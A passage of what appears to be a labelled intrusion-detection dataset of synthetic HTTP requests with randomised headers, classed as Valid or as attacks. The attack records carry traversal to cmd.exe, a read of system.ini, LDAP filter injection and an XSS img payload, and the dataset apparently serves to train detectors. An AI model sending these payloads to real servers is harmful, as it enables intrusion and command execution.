Upgrade: benr/6.9, ceas/6.6, oe8a/3.8, 3meta/5.3
Warning: 884 93.144.26.206:701 "e5urtc8hhy7ie8rxs" 
X-Forwarded-For: 151.227.134.198
X-Serial-Number: 40075996099747963
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

baschasrTuet=4&n3zTex6V7=nooDifindiUt9xc&Riunionwindow.openz=o5e=eoaa&sok922aa=nodeerl&nklaheqohlTuar=lgroup by&uXmagrsu3aasth=17085098&7ttA=group byrh=ehwinnth\ow &1y&ntlt3o=h@X&mdaas1rooeI=pvrneg&rrwkwm5igczhuhS=7hfe&9uC= 4zcnep$dh/ a

End - Id: 3920
Start - Id: 19615
class: Valid
GET /Uf3MVgaK-/tzRJn/rdwlt7erm6oowooees/sjrysnltnreC/e42ukNQMPVX4VGSo/bmNHCKc7dropX/qC3o@h5TunionZoptVmK/7iazTZPJ58Ek/cY.gif?ardddaenm=6041718&oxaewasi=cthnbenAti&7fo36drAinaccess_log=8&oatndhhsd1tj=25&t6lestitl=b5WGN2Fyje&yTarOnutne=tjsYdropicipea%3Bo&nullGCGes6_=54&qfhmBbrtghao=e7mamuet&l4XywinntSqdScmd=6228838 HTTP/1.0
Host: 66.30.38.92
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: i0r='axeishpn'
Client-ip: 146.158.107.168
Cookie: ge=4538;aHdedouami=actc9Iehatatmo;8Krcpsulogwinnt_3IDy=4080234831;eEote=anantdaais
Cookie2: $Version="32"
Date: Fri, 23 Mar 07 18:30:25 CET
ETag: W/"m2_RRH@r1h5YarI45"
Expect: rteasasb
From: widc@tloe.fr
If-Modified-Since: Fri, 25 Dec 09 23:13:51 GMT
If-Unmodified-Since: Sun, 11 Apr 04 03:20:51 UTC
If-Match: "ZR_xekjRWj3SvK9"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: hnwc eonohrme=eToyi
Authorization: lderk 1ltee=slanil
Range: -4,298-
Referer: /cAamr/micg/twary.aspx
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: Mozilla/8.2 (compatible; Konqueror/4.7; WinNT; etNttojstw; Rsiow; oeja9)
UA-CPU: x86
UA-Disp: 1867,055,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 2031x847
Via: 5.6 www.O5nyj.css, 9.5 www.Biu1dnb.htm
Transfer-Encoding: compress
Upgrade: emf/6.5
Warning: 589 www.edeegpf.jpg:32045 "9denaggal" "Sun, 01 Feb 04 04:42:58 CET"
X-Forwarded-For: 165.100.124.216
X-Serial-Number: 84453733272881684848
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19615
Start - Id: 13046
class: Valid
GET /WdjbinR/eG@cBC03Xo3/mjxjaRVUTk5OZq5k4-C/sfF3B@RuEa2vFJnOCQ/eROxyRKeSTAS/IEuvetgOu.jpg?eo=6199998&islt5y0essuw=hGe8O6d HTTP/1.1
Host: 3.63.69.250
Connection: 6lslb
Accept: video/*;q=0.2, text/plain
Accept-Charset: iso-8859-2, iso-2022-jp;q=0.7, windows-1252;q=0.4, utf-8
Accept-Encoding: gzip, deflate;q=0.3, gzip, compress;q=0.7, deflate
Accept-Language: d-ofe, zndy8ahq-t, 0endP-0hwh8a;q=0.8, iS-o9oel;q=0.2
Cache-Control: ilc=ngeTefme
Client-ip: 197.209.45.224
Cookie: epgohQanHdc=werd t ohCdH;f1ofygenh=haiwaxmd;4cotrns=e3aomerttI2eedy;hgq=eqz..3V
Cookie2: $Version="1"
Date: Mon, 02 Apr 07 01:47:29 UTC
ETag: "0NYhP@s3v_s7e@Exd"
Expect: 100-continue
From: isn1r@lopp9e.fr
If-Modified-Since: Thu, 06 Oct 05 22:03:23 UTC
If-Unmodified-Since: Tue, 18 Sep 07 22:54:38 GMT
If-Match: "J5N48kRFjdcZ2mQ"
If-None-Match: "mhwTwo8fxf@KXTH8Z_"
If-Range: *
Max-Forwards: 6
MIME-Version: 8.1
Pragma: lra=bn7L
Proxy-Authorization: Ycxr satemsyr=pveoeaeo
Authorization: Basic cmlpNHIwOmh6aG8=
Range: 309-6,-2
Referer: http://www.hdczpd.com/b6Sacho/Uver/rjaha/7est8dxn/rhca.php
TE: gzip,trailers,chunked;q=0.2
Trailer: Referer
User-Agent: Mozilla/4.7 (X11; U; Solaris 8.6; rw-LH; rv:6.3.7) Gecko/48713745
UA-CPU: x86
UA-Disp: 140,798,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 011x9947
Via: adhxt/4.2 233.165.116.200, HTTP/7.6 80.150.81.34, 2.4 www.iNhD.gif:3
Transfer-Encoding: deflate
Upgrade: uede/9.7
Warning: 652 138.93.253.43 "apimlrrynaOtM" 
X-Forwarded-For: 248.151.221.242
X-Serial-Number: 72290
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13046
Start - Id: 44506
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 141.94.42.206:23428
Connection: z722iy
Accept: image/*;q=0.5
Accept-Charset: hz-gb-2312;q=0.3, hz-gb-2312
Accept-Encoding: compress;q=0.6, deflate;q=0.1, compress, identity;q=0.7
Accept-Language: bUxu-rxosrw;q=0.7
Cache-Control: only-if-cached
Client-ip: 245.96.181.37
Cookie: oA6l2zdhopon=433991;stdinJOTmhv6j=2$;ei1onAnsiSnletl=7e2Nscript+dyud9c:ta
Cookie2: $Version="123"
Date: Sat, 28 Mar 09 09:44:41 GMT
ETag: W/"BM7GJYNnC3qxjsK"
Expect: auaEbj2f=ti3z24oz
From: ciaeri@estekqcd.uk
If-Modified-Since: Mon, 04 May 09 20:29:35 UTC
If-Unmodified-Since: Mon, 24 Sep 07 11:20:46 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Apr 10 01:48:13 UTC
Max-Forwards: 75
MIME-Version: 8.2
Pragma: 6S79ho=egaepie
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM RlBFdGF0dDRhYXd6dHYwdW9zZWVjcjdhbjhvbjRhemJuOHVrcWVlUmw=
Range: 02051-7,-37253,903-654
Referer: http://Nheac.biz/Ivtw/Dsiajoae/oistvUem.exe
TE: gzip;q=0.6
Trailer: Via
User-Agent: Mozilla/3.2 (Windows; U; Windows NT 7.1; tr-lm; rv:6.6.9) Gecko/90456518
UA-CPU: Sparc
UA-Disp: 715,347,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 455x841
Via: 8ted/0.9 24.20.190.36, 1.2 66.147.105.139
Transfer-Encoding: identity
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44506
Start - Id: 45385
class: PathTransversal
POST /aoDnVninYHB/eucnrmttes.aspx? HTTP/1.0
Content-Length: 253
Content-Language: nSnpei7u,ttt,i3iltda6
Content-Encoding: gzip
Content-Location: http://Hsyaw3c.de/ciL8piE.nsf
Content-MD5: dXRlZWxocmZnZWl6bm90aA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Oct 04 01:49:23 CET
Last-Modified: Mon, 05 Jan 09 21:50:47 GMT
Host: 79.15.135.171
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: euc-kr;q=0.1, cp-950
Accept-Encoding: deflate, deflate;q=0.9
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 2.231.241.65
Cookie: 0bomvia5mut9e=449072;AaneeuySmeb=nen;b6u=~ |N;BstdinL70SXN=bfd;seuslt=96762889
Cookie2: $Version="96"
Date: Thu, 30 Jul 09 20:47:06 GMT
ETag: W/"I.WW9KVXZ3WpuyU2O"
Expect: oepa
From: nnrEog@dpyieuR.com
If-Modified-Since: Sat, 10 Jun 06 06:11:03 GMT
If-Unmodified-Since: Thu, 10 Mar 05 07:48:10 UTC
If-Match: *
If-None-Match: "DF49oJ3fqIoHh-M"
If-Range: *
Max-Forwards: 6
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic ZW9yc3M6dWRheTI=
Authorization: Basic ZXJldHI6Y3ppZWU4cG8=
Range: 49-
Referer: http://www.on4hh.uk/srewExa.jsp
TE: trailers,deflate;q=0.5
Trailer: Max-Forwards
User-Agent: rO49HwbOL http://www.rtjear.it
UA-CPU: Sparc
UA-Disp: 721,775,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 789x027
Via: 5.7 www.mn9qrrd.css, Ei2/4.9 215.206.48.5
Transfer-Encoding: gzip
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 611 158.221.222.98 "nfsr5r0ueesqlqn" "Wed, 02 Mar 05 08:12:12 CET"
X-Forwarded-For: 177.133.223.189
X-Serial-Number: 37550564020499
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

t8Gyet=\WINDOWS\system.ini&ntyxelmsevOf=aAv9n@&ge8t5xmklyeI=450084&iehhio5u=ea5&iniceBomacwrRn=iand a&otthetg=3081596&drr=Go3nt26&j4ytooMssc33rel=642&mfut=e&cufaraboheote=318&RzBS3xPB=deoswbrante&xjoT==t-  r)hs&q3qQen=mdt4mitYBq6eeL1&zheoda=ue

End - Id: 45385
Start - Id: 33043
class: Valid
POST /tePBZ_pqDPHer./ek_avM_1mZuQa/t3.js? HTTP/1.0
Content-Length: 225
Content-Language: dnfeeaeD,ttjuwInr
Content-Encoding: compress
Content-Location: /eokee.css
Content-MD5: ZWV0VHRuZWFkdHNqczk1Zg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Jun 08 14:02:56 CET
Last-Modified: Fri, 05 Sep 08 07:43:14 GMT
Host: 172.101.223.165:9172
Connection: dgcmdno
Accept: video/*;q=0.9
Accept-Charset: koi8-r;q=0.9, windows-1258
Accept-Encoding: identity;q=0.3, compress, compress, compress;q=0.1
Accept-Language: *;q=0.3
Cache-Control: min-fresh=04
Client-ip: 194.86.32.74
Cookie: efetdeedtal=r-B.UD1p4;kQqil7mEnwiimd3=r
Cookie2: $Version="680"
Date: Tue, 01 Jan 08 02:04:26 CET
ETag: W/"7Qwj45KIW9CmgO1snJq"
Expect: 100-continue
From: ekecyvb@mao43ira.ch
If-Modified-Since: Thu, 22 Jan 09 09:59:00 UTC
If-Unmodified-Since: Thu, 28 Jan 10 01:00:48 CET
If-Match: "jRBqilAsnZjULNU"
If-None-Match: *
If-Range: "7lWz9lHoTTTm9kKvtn@"
Max-Forwards: 78
MIME-Version: 9.3
Pragma: a=aiUit
Proxy-Authorization: Basic Zk5sZXNXOm51dGF0
Authorization: Basic M2FobzptbmlqZA==
Range: -1,0950-
Referer: http://www.5eiexer.org/aomi/niieal/tngesE5n/mUyq.asp
TE: gzip,trailers,trailers
Trailer: TE
User-Agent: Dys8lf
UA-CPU: StrongARM
UA-Disp: 6826,952,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3468x969
Via: 5.4 154.66.207.220
Transfer-Encoding: identity
Upgrade: eabbw/5.6, t0eah/5.1, ezh/2.6
Warning: 507 73.160.26.19 "oddefdnbitxk" 
X-Forwarded-For: 242.105.173.22
X-Serial-Number: 71160
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

hr9ia=vvnohnoc0tma3&epi=ys4oyariap4rt&gs4saeeo=aX8o&i1ihmcewE=o&ie1etmh=ur+omaH'vdpo+ec&rHdt2x7rdsht6x=qYO&rarnwpnsEEdeea=fiv6rijiaehteiem&8ahaao1on=eTcnllhehomes8aform&yoal5hwnrecH=9&ser1amrt8=985647&yrcct2id=928020416

End - Id: 33043
Start - Id: 38486
class: LdapInjection
GET /seMm@OqygHopVU.@qC/j9FX0dbinP/stXbpWrFWgzvD6LgK./nb/Acatmetapsboot.inin@Vls/nln3elr6jU/sNk_A@N_YvrG/m9hY-6BBC4lUxxAVnC/boot.iniY/amieodstTlLzRsorSedn.jpg?oOwtrq2pidna=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&iIeeoas8dt=abriwDi%28Nl7 HTTP/1.0
Host: 134.62.51.215
Connection: eoaa6
Accept: application/zip, video/*;q=0.6, video/quicktime;q=0.6
Accept-Charset: iso-8859-15, windows-1257
Accept-Encoding: *;q=0.9
Accept-Language: r6M14ca-i0up, lodrrce-rcul;q=0.6, tKsndel-xredwpa2, to-nciho, twr-p
Cache-Control: max-age=25801
Client-ip: 50.101.101.125
Cookie: autoexecMxbpUbin7includeXiS=f8C@R4Q
Cookie2: $Version="9"
Date: Mon, 12 Jan 09 24:03:53 GMT
ETag: W/"HdLDJ1hGjmZABeS"
Expect: deissg=asa6
From: b8antatt@o1neid.cz
If-Modified-Since: Tue, 13 Apr 10 06:20:18 CET
If-Unmodified-Since: Mon, 31 Mar 08 23:37:27 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="kmaaul"
Authorization: oatv 5ZnEesnv=wtrwla
Range: 900292-227,511-1,719645-073
Referer: /segn/a8g4/dHut.wav
TE: chunked,gzip,gzip
Trailer: Authorization
User-Agent: jtbi (wb5mY2Xd1; sTl-v39Ja; i4BgREh; tGGmgD_a.1; tyMxs2aoI)
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6621x951
Via: FTP/2.7 143.153.47.91, eedddT/9.4 www.wedcpfa.shtml
Transfer-Encoding: identity
Upgrade: atd/6.6, fyohd/5.4, rwOx/2.2, 2patf/9.0, swe/3.6
Warning: 452 41.87.126.70 "dmjieaeidaaztbptOti" 
X-Forwarded-For: 21.183.247.173
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38486
Start - Id: 8295
class: Valid
GET /r_k/iCDGv0GB7rDkqBK/sEVnjm.mspx? HTTP/1.0
Host: 25.220.3.77:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9;q=0.1, gb2312;q=0.2, iso-8859-3, x-mac-arabic;q=0.0
Accept-Encoding: *
Accept-Language: rbTa-7tfns;q=0.9, e0f-nhr1nsh, rven-r;q=0.6
Cache-Control: no-store
Client-ip: 61.69.86.185
Cookie: twas4Newster3=5076;b3etbgqnsir7=vbscriptar;swPuyiesmdnni=5022529
Cookie2: $Version="82"
Date: Fri, 24 Nov 06 03:18:03 CET
ETag: "SF6ntt3pM9U3EuHN@Oj"
Expect: 100-continue
From: epaiNa@tesaenml.net
If-Modified-Since: Mon, 15 May 06 04:05:03 UTC
If-Unmodified-Since: Sat, 24 Jun 06 20:03:57 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0195
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVnb2ZoYXNMcHNlT2VwZm5hY2VFZHRoYTNVcmVnaHNTZWFsam90YWxkUmNy
Authorization: Digest nonce
Range: 9-,-1,846-
Referer: http://www.ezeTr.be/yn8uti/szeep/Iqdyoith.png
TE: trailers,gzip
Trailer: Range
User-Agent: lsat/6.2
UA-CPU: x86
UA-Disp: 9881,382,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 138x587
Via: 2.2 www.uaytef.css, 7.1 246.223.142.254:4702
Transfer-Encoding: omit
Upgrade: n83/8.7, wpeioz/2.0, Rbtic5/8.3, s4h/9.8
Warning: 166 128.16.194.221 "tetd7downhmnsrzsiWo" 
X-Forwarded-For: 9.228.133.238
X-Serial-Number: 02984
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8295
Start - Id: 44045
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 231.24.14.209:70
Connection: close
Accept: */*;q=0.6
Accept-Charset: koi8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=65
Client-ip: 11.19.174.55
Cookie: boot.inizF1ny@G=8925035155;oct=de1LvgormtIta;gs=olE;jI96BeRqXrOb=oaoasu;ndnnsta=Ac;jlle4oaemwu6=ei6DA1uLz
Cookie2: $Version="20"
Date: Sat, 20 May 06 08:13:26 CET
ETag: "8UxO4gjUxGz_xq4DjY"
Expect: 100-continue
From: 6aep@Eebnu.org
If-Modified-Since: Sat, 30 May 09 20:22:03 CET
If-Unmodified-Since: Thu, 08 Apr 10 17:29:06 UTC
If-Match: *
If-None-Match: "cvZ-j7azdGPgm9I4"
If-Range: Thu, 01 Dec 05 04:13:54 CET
Max-Forwards: 18
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: 3kfrae lae59lhs=Se9l
Authorization: Digest qop=auth
Range: 67-764741,470518-20,3-202913
Referer: /e6oe.rar
TE: trailers,chunked
Trailer: Authorization
User-Agent: lahowcp
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 695x429
Via: deaoxc/4.0 29.20.165.153:913
Transfer-Encoding: gzip
Upgrade: Eaxve/8.7, yk0s/2.8
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 44045
Start - Id: 46889
class: XSS
PUT /nX8iFlZOk0V7O8FehMu/gn/Jl9fiaTioiehdhlIyt.shtml? HTTP/1.1
Content-Length: 322
Content-Language: iAna
Content-Encoding: deflate
Content-Location: /e4ot/chp73y.conf
Content-MD5: YnVhZm5pc2N6cnNqQzFlbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Jul 07 10:26:36 CET
Last-Modified: Sun, 29 Aug 04 24:19:36 CET
Host: www.erto.be
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-ce;q=0.2, us-ascii, koi8-r, windows-1253
Accept-Encoding: *;q=0.3
Accept-Language: XeUhngg-Eek, wfEasnra-lo
Cache-Control: max-stale=8738
Client-ip: 164.249.24.153
Cookie: tt=n@t eiueN;stiEonptb=FloP;Lxp_vu.divrZA=ouQ
Cookie2: $Version="49"
Date: Wed, 07 Apr 04 19:07:25 GMT
ETag: "NzR-ApOJwLt0kq3"
Expect: 100-continue
From: nbfea3@yM2KA0.biz
If-Modified-Since: Thu, 05 Feb 04 19:46:31 GMT
If-Unmodified-Since: Sun, 08 Jan 06 14:07:57 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 02 Mar 08 03:38:09 UTC
Max-Forwards: 6
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic Y2VsZ2luZTpmYW5vOUUz
Authorization: f77db aetmsn=Lobo5twv
Range: -1
Referer: /tnwoe08/ttwtnbr/draN/sOEweoa/Yeldos.asmx
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: tr34oa/1.1
UA-CPU: Sparc
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: tWfos/8.2 250.12.26.107, sar/1.4 111.11.79.32, 8.3 19.189.58.4
Transfer-Encoding: gzip
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------
~~~~~: ~~~~~~~~~~~

ser=1&delete.z0XXYwiwgetC=objectra&ti=cg1tro&ugot=|g=&huAyssh=a2LIeO1@4n&neelehgnnqaet1u=ir-BuxteL8fW&xe2futts1E=<img     dynsrc    =    " javascript:   [alert    ('oohR9hte7');] " >&ufnziiesdudy1t=arQuq9h&dh=gavbscript9eallmFC&ywi9rjaezsjetll=l5Et&s5jsne=65inputpxdb7t&XZOQ7ZscHT5w=rtg45XN

End - Id: 46889
Start - Id: 7266
class: Valid
PUT /lK/yRotoMlhh5btEVtti/nea9rphahsiiMs5rra/es0yUXrqGb5/t8wauEW_KWuovcfvX/TFyWkl5BwzHDtelnet/yenTiAtun/vnsic61ealx/si1t/u17t/dsiane9usts9sx.css? HTTP/1.0
Content-Length: 27
Content-Language: cohc9,hHspsnn
Content-Encoding: compress
Content-Location: http://www.i6mti.st/eaeH/lnza6foh/o6sInutp/AtE6.jsp
Content-MD5: N3NpYWljaUNzb3VJZHN3cg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Jun 04 06:15:58 GMT
Last-Modified: Wed, 15 Apr 09 17:47:52 CET
Host: 89.179.139.101:493
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-hebrew
Accept-Encoding: gzip;q=0.1, identity, gzip, gzip;q=0.8, deflate;q=0.8
Accept-Language: sl-pan1;q=0.4
Cache-Control: max-age=24
Client-ip: 35.74.208.224
Cookie: zbhc=8374735
Cookie2: $Version="79"
Date: Sat, 22 Dec 07 09:57:28 UTC
ETag: W/"QK-SpyEI8dWX4GBl5u"
Expect: 100-continue
From: eacdn@ftim.gov
If-Modified-Since: Mon, 15 Jun 09 07:25:51 GMT
If-Unmodified-Since: Sun, 27 May 07 07:53:22 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 08 Jun 04 01:29:08 CET
Max-Forwards: 52
MIME-Version: 8.1
Pragma: suyt=o
Proxy-Authorization: ntsAjG eRoonit=huowas9
Authorization: Digest algorithm=neyai6ne
Range: 11821-7543,537100-25,4-
Referer: /fak0a/8Neldec.swf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/0.1 (Machintosh; U; Mac OS X 1.5; ic-ut; rv:5.7.6) Gecko/77913207
UA-CPU: StrongARM
UA-Disp: 6402,121,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 629x010
Via: 7.0 www.vozr0.html
Transfer-Encoding: compress
Upgrade: 1tvot/8.2, om0aAe/7.9
Warning: 038 www.lr6tO.html "rmcnauss8" 
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

unn=s68&rrnnx=3aand9dxeaanl

End - Id: 7266
Start - Id: 32637
class: Valid
PUT /0taei/tdafsfu/T9tatehenahoiazAenw/eDTOiN/IceDNs1lhcvh9muh/2IctG/npiobxiieet/26@/1SBYnXF/edh66oseamtxjnt.cgi? HTTP/1.0
Content-Length: 150
Content-Language: fWShiehi,yW
Content-Encoding: deflate
Content-Location: /0Uaf/h0cmbme/IntfroU/koCe98i/smtsesw.htm
Content-MD5: dGVUN29kNkl3aGF6b2FqZw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Sep 09 04:12:26 UTC
Last-Modified: Mon, 01 Mar 10 08:51:47 UTC
Host: www.5udEa6e.com
Connection: close
Accept: */*
Accept-Charset: x-mac-korean, big5
Accept-Encoding: compress;q=0.5, deflate, gzip, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 139.120.203.64
Cookie: rlacropTns=e ne;AZotmp9isI6u=oIztl<ui |r%e(%te
Cookie2: $Version="86"
Date: Sun, 21 Oct 07 12:39:29 CET
ETag: "mIeVAW7NphVBy_S"
Expect: i6bhrc=ezzo
From: ueoto@th0yt1ahea.uk
If-Modified-Since: Thu, 07 Jul 05 08:17:13 UTC
If-Unmodified-Since: Thu, 24 Jan 08 03:59:01 GMT
If-Match: "7h5KAshypDD5_vJ24"
If-None-Match: *
If-Range: *
Max-Forwards: 8081
MIME-Version: 8.6
Pragma: 8=4o0eocra
Proxy-Authorization: Basic b25ycnE6OWxwZ2dl
Authorization: tEat nNo1m2n=IdoRpSh
Range: -8365,-00217
Referer: http://www.ntgrthG.fr/nsa8/fetXeEne.php3
TE: deflate
Trailer: Cache-Control
User-Agent: 3FPm-u http://www.ou7V.be
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 853x924
Via: 4.2 228.147.251.150, 5.7 www.cJaosg.gif, FTP/2.6 www.1eb8h.jpeg
Transfer-Encoding: compress
Upgrade: ynt1h/8.2, ngs7ii/4.5, emia/0.6, hboy/6.2
Warning: 960 www.0iBqm.htm "egimmrwtfsoosti" 
X-Forwarded-For: 118.148.230.191
X-Serial-Number: 14198779071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

n5nloam3hqxavn=9e&sna6=908048&PztOBJ5cat1Uh=e htpass&doaieea=y&wh= llinkse|ps&Gs1evezrysoTTa= ||h ktmpeeswindow.opene3aoorusr&aZNcsneonq=7755560

End - Id: 32637
Start - Id: 10726
class: Valid
GET /vyc@Bz.E/5gXWMORboot.iniTh/IWg-Ba7NB1HrcpweE/uPfH/t0to5rg/nDOwUON.j11@@FrZTZE/e1NZ4PekCGIsJ/bl/wxwdFjz/lsigohne9poriitN.exe?orGzgcNQdeleteRAz=uwhw HTTP/1.0
Host: www.2eu7u2Nnr.cz
Connection: close
Accept: text/plain;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.3
Accept-Language: ee-a9em
Cache-Control: only-if-cached
Client-ip: 4.31.123.70
Cookie: erhiJlxnvNvkaD=25496;etxD5h8FlaeaQm=76456;ynottEcuTdaFe=sock_streamcehninNcr 5npm tftpxe;amaTzasg=hai;felaMrfyciby78=kJqoyU_d
Cookie2: $Version="2"
Date: Mon, 15 Jun 09 17:55:31 GMT
ETag: "WUg9JirefD8v_q3MzuXi"
Expect: sIga
From: iEhs6@tsbIsEt3.org
If-Modified-Since: Wed, 11 Nov 09 04:07:49 CET
If-Unmodified-Since: Thu, 11 Aug 05 24:26:38 GMT
If-Match: "k-6KpY7Qn1XgP49"
If-None-Match: *
If-Range: "oJPbZIMcyvOGl1AA"
Max-Forwards: 55
MIME-Version: 0.9
Pragma: iett=atR
Proxy-Authorization: Digest nonce
Authorization: Digest uri=http://adoAg.gov/lAlsuSx/ifdSlt.swf
Range: 02-95
Referer: /ieklC/YemOOi/mceslu/ieads/mpsniEgc.php
TE: gzip,chunked
Trailer: If-Range
User-Agent: eeaioa (tHJ4Op; rdp5Xf8; r@79hnW; eCvs84p@7; lWDWTRN)
UA-CPU: x86
UA-Disp: 592,9913,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 060x417
Via: sj7it/9.7 www.eaw8.gif, u0moyg/8.8 www.Thvmsng.png:9
Transfer-Encoding: gzip
Upgrade: gjt/4.3, itcx/2.4, irszE/9.6, eddtrv/8.3, o0tg/6.1
Warning: 426 117.201.51.141 "WtatHstet1tscTat" 
X-Forwarded-For: 119.229.255.152
X-Serial-Number: 62509497376132928
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10726
Start - Id: 14337
class: Valid
GET /Kopt.wJ/eB2VawW/qbhiydeneTtN/2wBYw.j9Sn4eUM3u3t/zecrNninsert98iposition/jvarZzw-/mHqFC-n@Cb2PF5UX4GJ6/r0PxzWIE4q-oiTA0Ajw-/KperlltCS9kQscatm/daiegwrnn0dseperoei/eaOmkems.jpg?ip4ifeee=cyumagnnvsGfoottsc&dtYdotidautenee=o-tmp&tbratahbe0sbtee=beoe%7E&iefewsCerni=oscssqatrennt&hgtni3lAm=5113804&ia=shutdown&oegxe7ejdo=6029711&nI0d6=odocumentrfsB%5C5tnihm&insertcopy8EsYqlKb=https2sock_streamt2krdaeehaL&lostdinw3Sboot.inife=z6Lee HTTP/1.0
Host: 157.178.168.131
Connection: close
Accept: video/*;q=0.5, audio/*;q=0.4
Accept-Charset: iso-8859-1, x-mac-chinesetrad;q=0.5, shift_jis, iso-8859-8-i;q=0.8, windows-1254;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-stale=444
Client-ip: 49.192.64.140
Cookie: g1MRcv1=oTM0r6dGQJpg;eval1jmMxXuP=pranstQceE3srho;1e6ttsrkh=Tenwwuoulnii3ei;cQprllzi3deuait=rhsdeany
Cookie2: $Version="48"
Date: Tue, 14 Nov 06 17:58:31 GMT
ETag: W/"WxFpJ8ctmwuCHKC"
Expect: 100-continue
From: nscEel@itiaa.net
If-Modified-Since: Sun, 12 Aug 07 23:05:45 UTC
If-Unmodified-Since: Fri, 03 Apr 09 02:17:50 GMT
If-Match: "@JWHpC.1tbe.UVALTPY"
If-None-Match: "c3pNjIr_P0PAo7w"
If-Range: Mon, 08 Feb 10 14:00:41 GMT
Max-Forwards: 8
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM NHRva29lbWNxcENmNEh0dExiTnNIdGg5bnVycnVhZXMxbHRkZQ==
Authorization: Basic cDRBYWg6eXJvaWU=
Range: 938-
Referer: /5rr8n4/eie4fTe/zKreooau.cfm
TE: gzip
Trailer: Upgrade
User-Agent: Mozilla/6.4 (compatible; She1; Win 9x; occomacach; fTu2)
UA-CPU: StrongARM
UA-Disp: 5219,163,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2649x359
Via: FTP/5.5 35.243.178.96:3231, tiDid/5.4 www.inetedxu.jpg
Transfer-Encoding: compress
Upgrade: 9sii2/1.4
